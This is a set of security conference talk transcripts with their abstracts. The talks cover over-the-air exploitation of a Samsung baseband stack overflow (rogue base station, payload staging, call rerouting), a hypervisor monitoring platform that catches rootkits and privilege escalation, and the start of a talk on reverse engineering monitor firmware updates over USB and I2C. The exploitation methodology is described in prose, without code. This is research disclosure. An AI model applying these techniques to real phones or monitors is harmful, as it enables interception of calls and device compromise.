yet. And then when the the OS parses this message, there's basically no checks to prevent your classic stack based buffer overflow when processing the length of the of the information element. Easier to just look at the code. So really, what you end up with is more or less every Buckhunter's dream. It's a straight up stack based buffer overflow, where your input size can be more than 200 bytes. But the buffer that we're copying into was four bytes, and it's right at the very end of the stack frame. So right next to the return address. And you have essentially entirely, you have complete control over the values. So there's no encoding limitations on your 200, but have you bites either. So that's a pretty good situation. And now Nico's going to walk us through how to end up being the exploit. Yeah, so obviously, the point that point to own was to through some ways show that you have arbitrary code execution on like the desktop space. It's it's like fairly easy to tell what kind of payloads those were on like the radio stack wasn't so clear what we actually wanted to do. But anyway, this is a simplified version of what we have shown. Dragos at point to own. So on the left side, you see for those not familiar with the device, you see the dam pointer. Okay, so on the left side, you see the galaxy as six, which is the phone that we're going to attack, then two other phones. And we're first going to call the one in the middle, and then see what happens. Oh, God. Is this playing? Okay, so we call 1338. That's important to memorize for that part. And you see the phone is ringing, but we're not accepting the call. But otherwise, there is like no visible indication on that galaxy as six. But at this point, we already exploited our bug. We call the same number again. And now all of the sudden, the phone on the right is ringing. So no, you may wonder like, why is this important? So what we have shown then at point to own was we gave Dragos the phone and said, okay, here, like, call yourself and then the phone in my pocket was ringing. And the idea we had was that on the one hand, this is a fairly simple payload to implement because it's like below 100 bytes. It's nothing that's too long. But on the other hand, this also gives you the capability to do a man in the middle as long as you know what number was originally called. And three GPPS nice enough to actually have a field for that, which is called the called party sub address, which you can use to stuff in the original number, then initiate the new call and then listen in the middle. Okay, so how do we actually deliver our payload over the air? I don't want to go too much into like the background description here. I think most of you have probably seen a talk about how to run your own gsm network or something like that. We used open BSC in our case because this bug was sufficiently enough to exploit over gsm. And then on the on the radio side, you will need your your bts for that. There's also tons of options. So just mentioning the ones that we use, we use on the one hand the sysmo bts that you can see there and the usrp one. So that's not an expensive setup. You can get this below 500 bucks actually recently got an anno bts on ebay for 200. So it's actually there's like no barrier for this kind of research anymore here. Now, once you are able to like deliver your payload, the first thing that you are going to run into is okay, are there mitigations that actually prevent any successful exploitation here? And the good thing is Shannon is not entirely fragile. So it does do some checks. So the dead beef markers that I mentioned earlier on are used to check for stack overflows. You also have guard words in between heap chunks. And as mentioned, the RM seven supports xn and as we've seen Samsung is also using that. So that sounds not that bad. However, on the bad side, there's no real baseline mitigations whatsoever. So you don't have stack canaries. You don't have any metadata protection on the heaps. You don't have safe unlinking. You don't have any randomization for code relocation at runtime. So in terms of the exploitation, and this is also why we didn't talk much about the box here, because this is really like partying like in the 90s. And it becomes even worse because so they they are using xn. But unfortunately, they are not using this very effectively because heap and stack is actually not one of the areas that's protected by that, which we were very surprised about at that point, we already like compiled our nice rock chains. And then we're like, Oh, that was like not even necessary. Yeah, so that much about mitigations. So yeah, looking at OTA exploitation, you're usually also looking for a couple of primitives that are useful along the way. So the first thing you usually want is some kind of a way to get like a controlled memory into the baseband. And hopefully you also can put that at an address, which is maybe less fluctuating at runtime or maybe even static. And there are two things that we found very useful for this. The first is the short term mobile subscriber identity, which is an ID assigned by the network and assigned to the phone and sent to the phone as well. This is essentially a known D word that you can put in memory. And then you also have the network name. So this is the string that you see at the top of your phone, which tells you, okay, this is T mobile. There's a long one and a short one. And I don't recall which one is which, but the nice thing is one of them you don't see on the actual phone. So this is the second thing that you can use to get your payload into the device and on arm conveniently enough, you can write a phonomeric shell code as well. And what's also nice about this area is that this is just fetched once you once you change the network. So as a result, this is usually not cached. So the usual caching problems you have on arm, you don't have if you if you want to use the network name is kind of a trampoline to jump to the rest of your payload. The next problem you will run into is size restrictions. So as we've seen, the the IE's are usually not that large. So most of the radio messages are definitely below like 255 bytes, which is not a lot. But because of the way that the code is written here, and then you talked about like how you have these arrays that for a certain type of message specified, like what kind of handlers called, you can essentially, yeah, to put it in hipster words, you can like program your weird machine there. So you execute certain functionality on certain radio messages. And by doing that, you can nicely stage a payload in case you need more functionality. Usually, you also want to have some kind of clean return. So as we've seen in the in the video, the phone is not crashing. Also, there's actually a symbol at the top, which when the baseband is crashing, you will see that with a small indication. In our case, we didn't want to have any of that. And because of the way that the tasks are operating by simply being loops that process messages over and over again, by making sure that you set up your register values accordingly, you can essentially just jump to the beginning of that loop, and you're fine. And the modem will keep functioning and will happily process the next stage of your payload or normal functionality so that even when you go back to like the normal network outside of our rogue BTS, you will have no problems whatsoever. And this is also similar for persistence. So when we gave the phone to to Drago said point to own the call was obviously happening in the normal network. So you want that your payload survives there somehow. No magic here again. So flight mode or switching networks, any of that doesn't affect any of the functionality. So as long as you can put payload somewhere in the modem and you can keep executing it at some point, you will have no problems with persistence on that point. And as most people don't regularly switch off their phones, that's, that's not really a huge problem in practice. So we didn't have to look at persistence surviving reboots. There's some options for this one is mentioned here. So one thing that you can look into is like the loading of radio configuration values for N and V. Yeah, we didn't have to do that. But that's that's very likely also not not a big, big problem in practice. So talking about payload, so you've seen that the demo is kind of maybe not what you expected. So maybe some of you expected that, okay, we snatched like all the photos or context from the phone. And one thing that then you also scratched at the beginning is that people keep talking about like how you have the second operating system and your operating system that can control everything on the device. But this is really not the case anymore, at least on most like high tier smartphones these days. So the the basement is usually loaded by the application processor. Maybe it talks via HSIC or something like that to the application processor, but you have separation. And even though this may not be perfect, you really just have limited control. What you also don't have in the basement directly is like secrets that you can steal directly. So really in terms of the payloads, as long as you don't escalate to the application processor site, you're looking at essentially messing with all the data that goes in and out of that modem and essentially utilize the fact that there is like no nothing like end-to-end encryption. And as I mentioned in our demo, we used that to reroute calls. Now we also had two major fails that were causing us a little bit of time. The first one was related to caching. So originally we thought that for gaining persistence, we will just patch some of the code by like reconfiguring the memory regions. Turns out this is not working reliably for us. We're actually still not sure what the reason is. One thing that's specific about Shannon particularly is an architecture called or a feature called the low latency interface, which is a inefficient way of essentially sharing RAM between different cores. But we were thinking maybe it's related, but really we have no clue. And eventually we went for like patching data and function pointers in order to gain persistence and just put our code somewhere on like an unused part of the heap. The second problem, and this is definitely painful when you try to maintain your payload before the contest and making sure that with every update, your ROP chain still work. And this is called what we call dual SIM snafus, and this is Shannon specific. So the S6 doesn't support two SIM cards, but apparently some Samsung devices do. And the way that Samsung implemented this is by simply like duplicating all of the functionality. So every function you will actually find twice. You also see that in the file names in the beginning. And that's a huge pain once you try to like bind if symbols and part your changes. So this is something that you want to pay attention to because otherwise you will spend a lot of time figuring out why your exploit doesn't work because you used the wrong address again. So the last thing that people usually keep asking about, and this is definitely considered the holy grail in this space is, okay, how do you escalate your privileges towards the application processor? This is definitely ongoing research also on our side, so we can't claim that we did this. But we essentially see two main ways to do that, and one is actually not really modem specific, so there would be no magic about this at all. And this goes back to the fact that the modem does see all the data that goes to the application processor. So just by coming up with a payload that would make use of the fact that you can inject stuff into that, let's say you inject like a small JavaScript stuff that then is your payload for owning a browser, application processor escalation really becomes like every other exploit that point to own and has nothing to do anymore with modems. That's the less interesting route, though, at least from our perspective. And then the second route that is available is you look at a lot of IPC traffic that goes in between these cores. There's obviously a lot of pausing and range checking on this. That's done. You have also some peripherals that you can access directly memory-wise. But this is probably hard, and on the flip side, if you find a bug there, it's probably living for quite a while. But what you are more likely to look at is the services that build up on top of this, like really is a good example. And some of you may recall that the Replicant Android project at some point published an alleged backdoor, which was essentially a directory traversal attack in a remote-affessed service that Samsung built on top of. Luckily, well, this is fixed by now. So this actually doesn't exist anymore. But this would have been an awesome way of escalating privileges because then you can essentially read and write stuff on the application processor file system. So this is the kind of things you're looking for. Now, for those of you who are interested in playing further with this, so one thing that we found that's very useful, if you want to debug any of the IPC messages that go between these cores, there's a very handy kernel debug of S file called SVNet memdump. And this essentially gives you a full memory dump of all the IPC traces. So you can look at that. And interestingly enough, so this will contain everything. So if you call a number, this will be the IPC message initiating that call. So it will contain the number. It also contains what networks were seen, if you switch to a network. So this is nice for debugging. On the other hand, this is also a huge privacy problem because that allows any unprivileged application on Galaxy devices right now to spy on users very effectively. So yeah, with that, I want to get to the final remark. So the intention of our talk was really to give an idea of what this really takes and how do you usually approach this topic. And I think I can talk for both of us here that our conclusion is that this is really not that special. So you have the usual real-time operating system primitives that you can identify, but there's no mad like baseband ninja knowledge required. So we definitely encourage other people to do more research in this space and to put a number behind this. The two of us work part-time on this three to six months. So depending on how you count, three months, I think we were at like pretty much understanding most of it. We found the bug. And then we were slacking off thinking that the exploit is going to be a quick thing. Unfortunately, it took longer as always. So we ended up six months in total. And we definitely think that there's still a lot of space for future research here. So I talked about the escalation. There's definitely a lot of things that you can do there. What's also very interesting is the target identification because one thing that is going to be a problem also at such contests is when you go there, okay, what's the actual firmware version? Like it's not like you have one operating system that is just running the latest version of Adobe reader. But in the mobile space, you have like tons of OEMs, tons of different firmware versions, depending on where the phone is actually coming from and identifying that over there and picking the right payload can be quite tricky. So having future research in that area would be quite useful. Yeah, as Daniel mentioned, and this is not up yet. So give us some time. We are not one of the people who say we are going to release everything and then you never hear anything back, but we just didn't have the time to like put this stuff on GitHub yet because of our travel. We will definitely release all of the Ida plugins and tools that we have used throughout this research. And hopefully people can build up on that. And yeah, with that, I'm actually surprised we're well on time and we have time for questions as well. Are you talking about the network side? Okay, so he was asking if we have like any idea of the attack surface on the network side. This is also an interesting thing. So if you think about that you can use your phone to like exploit a carrier, that's definitely a pretty interesting thing. I would expect honestly that it's equally bad as in the baseband research that we have seen over the years. Maybe it's even worse because nobody actually has a chance to look at this. I'm not sure though if we will ever see any of this because like acquiring carrier equipment is not that easy. So yeah. Okay, so you're talking about like a real end to end attack that doesn't require a base station. That's actually, that's a good question I think because a lot of the fear mongering that comes with basements I think somehow originates from that angle. But I think it's fair to say that most of the attack surface is actually not in end to end parts of the code. So people have been looking at SMS and things like that and you find the bugs there but you're way less flexible when it comes to like staging payloads for example, like sending another message. So that I think there's bugs there and there have been historically also some real remote memory corruptions there but I think that's not the vast majority of these and most of the attack services. One thing that's going to be very difficult is Nicol mentioned it's hard to sort of get access to what networks are actually doing and I mean still to these days and I guess if we should even like know more maybe I mean with our experience working out of vendor but still I have basically no idea of okay what kind of filtering do maybe this operator or the second or the third or whatever applies. So you can you know even if you consider you find some issue in some layers of the stack for example I talked about the information elements there are some of them which are actually on paper end to end so it would be possible that you in your Osmo-com device encoded IE and it could it could survive the entire network but it's a huge question mark because you don't really know what the carriers do so really testing them out effective I mean that's really hard and the other part of it is I think it's something that you could call I mean it's an interesting target but we have seen that last year a lot with stage fright I guess and some other examples that if you think about end to end if you go higher up the stack in the application layer actually it's a much much much richer attack surface so I would say I mean obviously Matt too is here as well I mean you guys have seen the talked on the OMADM stuff so you know end to an expectation of mobile phones with using nothing but a number or is definitely possible but if I had to do that I didn't think you the first thing you would think of is you know the baseband right any other questions all right great thanks guys thank you very much you you
|
In recent years, over-the-air exploitation of cellular baseband vulnerabilities has been a recurring topic in the security community as well as the media. However, since “All Your Baseband Are Belong To Us” in 2010, there has been little public research on exploiting cellular modems directly. Now, Breaking Band is back with a new season by popular demand We will describe our methodology for reverse engineering the RTOS, starting from unpacking proprietary loading formats to understanding the security architecture and the operation of the real-time tasks, identifying attack surfaces, and enabling debugging capabilities. Through this, we’ll give you a complete walkthrough of what it takes to go from zero to zero-day exploit, owning the baseband of a major flagship phone, as we have done at Mobile Pwn2Own 2015.
|
10.5446/32745 (DOI)
|
So I'd like to welcome Satoshi Tanda back to Rekon returning after I think five years. So he's going to talk about hyper platform. Thanks. Yep, welcome to my talk. So before I start the talk, let me add one funny personal story. So this is a picture I took five years ago when I came here for Rekon for the first time. But this picture is not actually a picture in Montreal. This is a picture in Chicago. When I was heading to Montreal from Japan, I had to transfer my plane at the Chicago airport. And I was ready for this, but my flight delayed and I had to go to a different boarding gate from Japan. I originally had to go. And that was also my first time to visit different country and even take a plane. So I got confused and got lost in the airport and missed the flight. And ended up staying in the hotel in the nearby Chicago airport. That was a funny memory to me. And now, yeah, I'm pleased to be here without getting lost. I didn't go to Rekon.com. I managed to be here. So I am going to talk about open source hyper by the project named hyper platform. So if you are interested in Windows kernel, hyper by the system monitoring or some sort, you will be interested in. So in this talk, I am going to tell just a couple of things. So if you want to have more ability to monitor and control Windows system activities in a lightweight manner, hyper platform is for you. And hyper platform is a hyper by the design of a VM filter platform to utilize virtualization technology and write new types of monitoring tools on Windows easier and quicker. So that is basically what I am going to tell in this talk. So let me introduce myself quickly. I am Satoshi and reverse engineer interested in Windows kernel and I implemented hyper platform and I am working at Sophos as a threat researcher specializing in behavior-based malware detection. But this project is entirely done independently. So feel free to reach out to me directly. And Egoal, he is a core researcher and he is an independent researcher specializing in cyber security, especially memory forensic and root kit analysis. Unfortunately, he is unable to come here, but you can definitely reach out to him as well as me. So let me start with motivation. Why do you need yet another hyper by the project? So a few months ago, we had issues. We found that we still didn't have good tool to analyze Windows kernel activities. So in my case, I personally wanted to analyze Pachigar, not by my employer. My person wanted to analyze Pachigar. And Pachigar was a challenging component to reverse engineer because it doesn't allow you to modify Windows kernel in any way. So you can set neither break point or fork to monitor its activity. And Egoal, he also wanted to have a new tool to analyze Windows kernel because he constantly dealt with root kit for his research. Pachigar and Eida is always works, but it is always also time consuming. So those tools weren't quite efficient. But actually, a lack of tool wasn't a real issue because we kind of knew a solution to it. The solution was virtualization technology. So there are plenty of academic paper and analysis systems using virtualization technology. And also we knew that virtualization technology is just more than providing sandbox environment. So a lack of tool wasn't a real issue. The real issue was that there was no suitable hypervisor to utilize virtualization technology only for system monitoring purpose on Windows. So assume that you want to monitor a system by using virtualization technology on Windows. You need a hypervisor. But what options do we have? Like, first off, there are a couple of good looking commercial products, but obviously those were proprietary and not available to us. And if you take a look at some existing lightweight hypervisors on Windows, those lacked modern platform support. For example, HyperDevac, which is a really awesome project, but it didn't support 64-bit architecture. And if you take a look at more comprehensive hypervisor projects, those were just too large to understand and extend. If you hire the 4DS, you will probably be okay, but if you want to be independent, do some research, it's probably too time-consuming. And also, those projects want quite Windows-engineers friendly. It requires, say, Siegwin to install and compile first. We found that Box was actually a kind of exception. We found that Box was quite easy to compile and run and even understand, but that was just too slow for day-to-day usage. So to summarize, this is our list of challenges. We believe that we should tackle and we believe that a community needed a solution to it somehow. So we decided to work on these problems. And as a solution, we developed a hyperplatform. Hyperplatform allows you to monitor Windows system activities, including kernel. And it is open source and supports Windows 7 to 10 on both 64 and 32-bit architectures. And it is small enough. One of the nice things of this project is that you can compile this project on Visual Studio without any third-party libraries and can be debugged just as a software driver. And it is fast. And this is how does hyperplatform work. So if you are familiar with BluePill hypervisor, this is essentially quite similar. So first off, it is loaded into kernel address space as a software driver. And then it enables the VMX operation mode of the processors. And once the VMX operation mode is enabled, processors start to treat the entire system as a virtual machine and invoke a registered handler routine upon occurrence of certain events such as exception or execution of certain type of instructions or access to system registers like control register 3. And those events are called VMXJET. And hyperplatform implements G-Handler. So VMXJET handler in this example. And to get a rough idea of how event handling works, this is pseudo code for VMXJET handler. So when a VMXJET happened, processor invokes this handler directly and also gives a context of the system, namely values of registers and also a reason why VMXJET happened. And according with this reason, handler executes real implementation of handler for each event. And you can extend G-Handler for your own purpose if you want. And you can understand hyperplatform as a VMXJET filtering platform. And on the top of the hyperplatform, you can write extended logic only for events you are interested in. For example, move to control register 3 event. And you can forget about all other events you are not interested in. And this is essentially how hyperplatform is used. Then what is an advantage of using hyperplatform? And why do you want to use it? A short answer is you can do what you cannot do without virtualization technology. So firstly, like VMXJET is a new class of events you can filter. With hyperplatform, you can tell occurrence of a processor-level event and even just on access to memory if you configure extended page tables. And secondly, GVMXJET handler is quite flexible. So you can return a different register value against, say, read MSL instruction. And also you can return a different memory contents against read memory operation in a system. And importantly, none of them is easy to implement without virtualization technology. But with VT, it is quite straightforward. By utilizing those capabilities, you can implement meaningful logic for your own purpose on the top of hyperplatform. So let me share some ideas and example application implemented on the top of hyperplatform. The primary application I can think is kernel call analysis. For example, like detection of.g instruction execution. For instance, malware, rootkit often modifies a value of control register 0 to disable memory write protection. But this is quite uncommon on normal system execution. So you can detect that event with VT and then you can make further investigation. And the other application is detection of pull execution. So by using EBT, you can catch execution of memory and then you can check whether the address being executed is backed by any image or just a heap in kernel. It's called pull. And if it is just backed by pull, it is quite suspicious. So you can also make further investigation against this region. And with this technique, you can get unpacked rootkit code from the memory pretty quickly. So I will demonstrate it shortly. And as more advanced application of EBT, you can implement invisible API work. So if you are interested in this project, please check out GitHub page, so ddimon. So let me demonstrate memory mom which is able to detect execution of pull with a robot driver. So in this demo, I am... All right. So let's run 64-bit Windows 7. So in this demo, I am going to run malware which is packed. And then I will get unpacked code extracted onto memory using memory mom which uses EBT. So this is a driver file, malware rootkit file. And this is a corresponding IDA file. And if you take a look at our list of string, you can see that this is pretty short. And... Yeah. So most of the contents in the file is just a data. So those are quite strong sign of packed file. And then let's load memory mom. Memory mom usually doesn't show much logs because execution of memory is quite uncommon on normal system. But if you run this malware... So memory mom studied to show lots of logs. Each log represents execution of memory outside of any driver file. Yeah. So let's take a look at this entry. So this entry indicates that somebody executed this address and it is not backed by a driver file. It is just a pool. So let's take a look at the contents. It's a local kernel debugger. Now so the contents... So contents looks like an entry point of function on the heap. It is quite suspicious. So let's take a dump of this region. This address and wrapping to page boundary and a little bit backward and take one megabyte. So that's a extract that's of memory contents dumped to a file. And if you give it to either and loading it to our right place. And if you take a look at the address, execute it address, you can see a nice structure of function. And also if you take a look at a list of strings in this memory region, you can see many interesting strings. Like... Like... Like... And we didn't see those strings in the static file. So it is likely that this contents is an unpacked root code extracted onto memory. You can use this kind... you can write this kind of tool to assist your reverse engineering Yeah. So apart from code analysis, you can implement hypervisor based protection if you are interested in. So by like terminating a process instead of just monitoring. The EOP-MON is such example. The EOP-MON can detect a successful exploitation of privilege escalation vulnerability by checking a token field of a process structure in the kernel. And EOP-MON performs a token field check when a process that is currently executed on the processor is changed. So when a current process is being updated, Windows also updates a value of control register 3. And because control register 3 is a system register, it triggers VM exit. And then EOP-MON performs... it checks a process that is ending its execution. And system repeats this cycle for each process. And whenever EOP-MON detects token stealing, so successful privilege escalation, it terminates the process. And in case of EOP-MON, it is... VM exit is just a trigger point to perform a scam. So EOP-MON doesn't even use a value of control register 3. It's just a handy timer event kind of thing. So let me quickly demonstrate EOP-MON with a real malware. So I am going to run Gozi sample, which exploits a local kind of privilege escalation vulnerability. All right. So this is 32-bit Windows 7. And first I am going to run malware without EOP-MON and show successful exploitation first. Now we have a command prompt running with low integrity. So if you start any process from this command prompt, sub process is going to be also a low integrity. But this malware... This one. So this guy exploits a system vulnerability and gets system privilege first, then spawns system privilege explorer.exe. And then let's run the same sample with EOP-MON. So EOP-MON is also implemented on the top of the hyper platform. And run the same malware and see if it is going to be detected. So now I executed malware, the same sample, PID 1864. And then it starts exploitation, hopefully to protect the system. Now it couldn't... Like malware couldn't spawn explorer.exe because EOP-MON detected an exploitation and terminated the process before the malware does really bad things. So you can write this kind of protection or tools by using hyper platform. Okay. So... Yeah. So let me briefly touch up on some limitations on this project. So first of all, it cannot run inside virtual box because virtual box doesn't support nested virtualization. So you cannot simply run... You cannot run this project inside virtual box. And also it doesn't support AMD processors. And suddenly it cannot run with other hyper visors on the same box simultaneously. I am trying to find the time to fix this issue, but at this time it is a limitation. So you can run hyper platform and virtual box of VMware at the same time in the same box. And as for the future of this project, I hope to see more use of this project from a community in any ways. And so I am looking forward to hearing more feedback and ideas on what you can do with hyper platform. I have some ideas. For example, probably we can write kernel called coverage monitor for effective phasing with using Intel processor trace or we can write memory access visualization or authorization. Actually EGOL is working on this project at this time at this moment. And also probably we can write... We can use hyper platform for bug discovery, especially race condition type of bugs by analyzing memory access pattern with extended page table. But those are all yet to be planned. So I am looking forward to hearing more feedback and comments on this project. So let me wrap up the talk. So virtualization technology is powerful but still underutilized technology for reverse engineering and hyper platform is a hyper visor designed as a VM exit filtering platform. And yeah, you can utilize virtualization technology and write new types of tools on Windows quickly and easily. And yeah, if you are interested in, please check out GitHub web page. It is open source. And yeah, develop your own unique ideas and solutions. Yeah, that is all I have. Thank you. Thank you. Thank you.
|
We will present a HyperPlatform, which is an advanced system monitoring platform for Windows Operating System (OS). Using Intel VT-x and Extended Page Table (EPT) technologies, this platform provides speedy monitoring of various events. HyperPlatform is hidden and resilient to modern anti-forensics techniques and can be easily extended for day-to-day reverse engineering work. Even nowadays, there are no suitable tools to analyze a kernel-mode code for many of researchers. Steady growth of ring0 rootkits requires a fast, undetectable and resilient tool to monitor OS events for all protection rings. Such a tool will significantly contribute to reverse-engineering. While existing virtualization infrastructures such as VirtualBox and VMware are handy for analysis by themselves, VT-x technology has much more potential for aiding reverse engineering. McAfee Deep Defender, for example, detects modification of system critical memory regions and registers. These tools are, however, proprietary and not available for everyone, or too complicated to extend for most of the engineers. HyperPlatform is a thin hypervisor, which has a potential to monitor the following: access to physical and virtual memory; functions calls from user- and kernel-modes; code execution in instruction granularity. The hypervisor can be used to monitor memory for two typical use cases. The first one is monitoring access to specified memory regions to protect system critical data such as the service descriptor table. The second case is recording any types of memory access from a specified memory region such as a potentially malicious driver to analyze its activities. Also, HyperPlatform is capable of monitoring a broad range of events such as interruptions, various registers and instructions. Tools based on HyperPlatform will be able to trace each instruction and provide dynamic analysis of executable code if necessary. We will demonstrate two examples of adaptation of HyperPlatform: MemoryMon and EopMon. The MemoryMon is able to monitor virtual memory accesses and detect dodgy kernel memory execution using EPT. It can help rootkit analysis by identifying dynamically allocated code. The EopMon is an elevation of privilege (EoP) detector. It can spot and terminate a process with a stolen system token by utilizing hypervisor’s ability to monitor process context-switching. Implementing those functions used to be challenging, but now, it can be achieved easier than ever using HyperPlatform.
|
10.5446/32747 (DOI)
|
Hi, guys. Sorry for the delay. Before we start the talk, I just wanted to let you know that we will be giving this awesome artistic thing born in version 2 if you answer all our questions. So please pay attention. It's very hard. You guys will never get it. Hey, I just want to make a quick announcement before I introduce these guys. Just a reminder that there's an event tonight at 9 at the SAT, which is where the concert was last night. And it's at the Satisfier for those of you who have been there before. In the past, it's an experience. So with that, I'd like to introduce Aung Chua, Francois Chavono, and Jethin Kataria, who will be talking about monitors. So thanks. Okay. Yes. Like Jaden said, we're going to give out that really cool thing if you answer one really hard question. The title of our talk is a Monitor Darkly, and here is the cast of characters. Okay. I'm Aung. Jaden is trying to set up the demo down over there. Strong Francois is right here. I'm not going to do that. He's a Canadian. He's great. Okay. And this is Igor from HexRays, and I've never met Igor, so we just kind of made him up. Not in person. I speak to him over email a lot. Here is a concerned area man named Chris. He will be part of the story. And an area man of concern, Shaquib, which will also be part of our story. Okay. So primary main objective, right? We're going after monitors. That's what this talk is about. You know, why monitors? What is this? Is this really a security problem? You know, that's what we're here to talk about. So I thought, you know, in retrospect, you know, why I did the monitor thing, and I think it had a lot to do with, you know, back in the day, I used to exist in cubicle life. It was very sad. I found a picture of my actual hedge fund cubicle office thing, right? And I think that was my actual desk, and it contains actual sadness. And I think I went back to school. I, you know, maybe subconsciously wanted to dismantle cubicle life technology. So Jadon and I at Columbia University did a lot of work on Cisco phones. We looked at HP printers, and, you know, we did some work with Cisco routers. So the last thing that's left in that picture, right, is the monitors. So the monitor is going down today. That's what we're doing. But in more of a, you know, a serious note, right, let's look at this website. Okay. It's chase.com. There's a green little lock over there. Greening's good. I would probably, you know, posit that we've probably spent about a billion dollars creating all of the technology, the infrastructure, the support, the kernel, all the technology to support an infrastructure where we can put a green icon on that browser window, right? So we can feel safe about encryption. Looking at the lens in which we see this browser through, right, it's a monitor. So you know, if you want to compromise the system as a whole, right, maybe let's look at the minimum cost of one billion dollars for the crypto and all the infrastructure and all the security we put around the kernel and the browser, and maybe whatever the cost of bypassing the security and the monitor is. Maybe it's a lot. Maybe it's a little. And that's what we're here to talk about. Okay. And, right, a good hacker is a lazy hacker. So instead of going after the kernel and the browser to change the pixel from that end, let's see if we can just change the pixel, you know, and the screen itself. Okay. So this story starts back in 2015, right, we're traveling back through time. Right. So I get this really sweet new monitor in my office, right. In fact, I think Jodin has one too. And we look at it, we plug it into our machine. And the first thing that it says is, ah, USB to I2C solution from Texas Instrument and also TU, you know, what is it, like a 3410 boot device, right? So we look at that and we say that's pretty cool. That's very interesting. And then like a minute of Googling later, we find this post from Dell Support Forum. Right. And they said, don't worry about it. You can download this like weird driver. But really, you know, we only use it for firmware update and you should never need this. So everything's fine. Right. And I also thought, huh, that's also really interesting. So you know, I say to Jodin, hey, Jodin, let's tear down that spare 34 inch monitor we have in the office. But we already have a suite monitors. Why don't we take out that 34 inch? Yeah. Like who cares? And then every man concerned, every man Chris overhears this conversation and he says, like, have you guys no hearts? Like there's no end to your, your senseless savagery. And also I have a million then plugins and I'm very sad. Okay. And then I said, oh, that's the saddest story I've ever heard. Why about, how about interns? Let's give it, let's do it to the interns, right? They won't be sad. So right. This is our intern pit. We love these people. They're very talented, dedicated people working in our office. And it just so happens that the interns get standard issue, you know, Dell U2410 monitors. Okay. And, you know, like 15 minutes of Googling later, we find this really very informative document that says, you know, Dell U2410 USB firmware upgrade instruction, right? It is so clear that I think it's almost like insultingly clear because if you look at this instruction literally says like you plug the power cord in the power cord wall thing, okay, as a step, right? And then you do the rest. But the rest of the document, very informative. They actually show screenshots of this tool that Dell released to do firmware update, right? Lots of very useful information, like if you look up there, the name of the firmer image, right? So, you know, if we can find it, we maybe can do this process and figure out how, you know, a firmware update works on a monitor. Very interesting things. App test, right? Super sneaky command, OX500, who knows what that does, right? But whatever this thing is, this process takes firmware, copies it from USB and puts it directly into persistent storage on your monitor. And we thought that's kind of cool. Okay, so we do more Googling. You know, we find all sorts of things like Genesis and then G-Probe and then this hardware from the 90s, right? This thing takes a 12-volt power supply, right? And then it has a parallel port and it goes to VGA and some other mystery dongle. Every vendor, you know, every manufacturer of monitor makes something sort of secretly similar to this, but it's not the same. And we found this in tons and tons of monitors made, you know, like late 90s, early 2000s. Okay, more Googling, we find STMicrobe somehow is involved, Inolux is there, Athena is the thing that, you know, STMicrobe makes and then somehow all of this stuff ended up in a Dell monitor. Okay, so, what's a little bit Googling, this is what we found, the string app test, right? That's where we started. That's part of a tool that G-Probe or Genesis created called G-Probe, okay? And this, you know, in the early 2000s, appeared to be a very industry standard type of software that people used to manage the software running on monitors. Okay, more Googling later and this is the story. So Genesis Inc. was operating and at around 2002, they sold themselves to STMicrobe, right? But they were also the people who created G-Probe and they were very active in creating the VESA standard for this protocol called DDC, which I'll talk about, right? And then STMicrobe, you know, Genesis in 2008, right, they took their own IP and G-Probe and stuff that they wanted to mix together and created this chip called STDP600 or 6DXX and 880XX and then that was put into Inolux board and Inolux is a company that designed these screen controllers, which is, you know, partially owned by Foscon and then later, you know, Dell sourced Inolux board right into the Dell monitor. And this is kind of the reason why we have terrible security, you know, in monitors today, this mishmash of, you know, where this technology came from. And you know, we got a copy of G-Probe just by looking around and Googling. That's what it looks like. You know, it has the ability to connect to the device, in this case, the monitor over, you know, parallel stereo USB. Basically the story is, as long as there's some way to get onto the I2C bus of the monitor, G-Probe can update the firmware and do all sorts of other diagnostics, which is cool. Okay, and then we took the USB firmware tool. We captured the USB traffic, right? And it's very noisy, lots and lots of traffic. And this is a capture of like a snippet, tiny snippet of firmware update process. And before we get into the details of that, let me just brief story about DDC. DDC stands for Display Data Channel, right? It's a standard that, you know, was created by Vesa, and there are many versions and subversions of DDC. There's DDC version one, two, I think three, and then two B and subversions, you know, BI, B plus, AB, blah, blah, blah. Who knows? Okay, but now let's look at what a packet that has this information looks like going over the USB port. So this is a SCSI command, which is sent using USB master storage protocol over USB. And then this is another packet, which encapsulates DDC2BI packet, which has a payload of Gpro packet, with which you can, you know, ask about like register read or you want to do like run code or anything like that. This is a DDC2BI packet structure, which contains a DDC destination source, length, VCP prefix, which is like virtual control panel, and the Gpro message, and it checks that packet. So let me tell you like how you do a small command and talk to the monitor about this. Very simple command. Very simple command. It's basically a monitor asked, hey, I want to talk to you by sending a vendor specific CF code and ask for a register read. As a SCSI command. As a SCSI command. And then monitor says that I acknowledge that you want to talk to me. And monitor says, PC says that I acknowledge that you acknowledge that you want to talk to me. And I also acknowledge that you want to do register read. Over. So the last two packets is like end of transmission for the acknowledgement of the request command. And then again, and then again, the PC says, could you please give me a response by first sending a SCSI command and then asking for a get response command. And it says that I acknowledge that you want to get a response. So it says that I acknowledge that you acknowledge that you want a response. So here is the response. Over. Yes. So 12 packets, right? To do this very simple command. And we saw this over USB. We figured that out. And now we decided it was time to take apart some poor interns monitor and see what we see. So, you know, that's if you take off the back cover, this is what our monitor looked like. The logic analyzer and the bus pirate did not come standard. That's ours. We put that in there. Yeah. And you know, on the top, you have all the standard power equipment, right? On the side is this little USB controller, which we'll get back to. And on the bottom is a USB hub. And that big old thing with the aluminum, right? He'd think that's the sock. That's the thing that we want to execute code in. And then Francois mapped out all the different parts, right? So the main sock is the SDP 8028, right? And right next to it is the multiplexer for I2C and connected to that. Right. Via I2C is this USB 2649 is a programmable controller slash hub, right? And that's the thing that's on the side of the monitor that you can plug in a CF card to. But we're connected on the left side at the bottom. Exactly. So that's that one is a dumb USB hub, right? Which we'll get to. So when Jadon send this packet, right? As the URB packet, what happened was the packet went through the USB hub. So the reason why the first command is a undocumented SCSI or XCF command is it goes up to the hub to the 2649 over USB, right? And that puts that device into like super sneaky I2C instruction receive mode. Okay. And the second packet that you send, right? If it's the right format over URB, right? Get sent to the hub to the controller. And the controller then takes, decapsulates that packet, takes the raw I2C message, right? Puts it right on the I2C bus and just sends it directly to the microcontroller, the SOC. And that's why you have so many packets. Basically, you put this thing and the USB controller actually does the decapsulation. And this allows you to put whatever I2C message you want onto the bus. And if you can do I2C messages, then you can communicate with the SOC, right? And we'll show you what you can do with that. You've flipped the board over. We found a two megabyte SBI flash, right? So we did the obvious thing, dumped the flash. And this is what an in-house entropy analyzer that we have, which is renders entropy. White is really random. Black is not random at all, right? Just right off the cuff, looking at the image, that's obviously some kind of weird table structures we're interested in that. This kind of 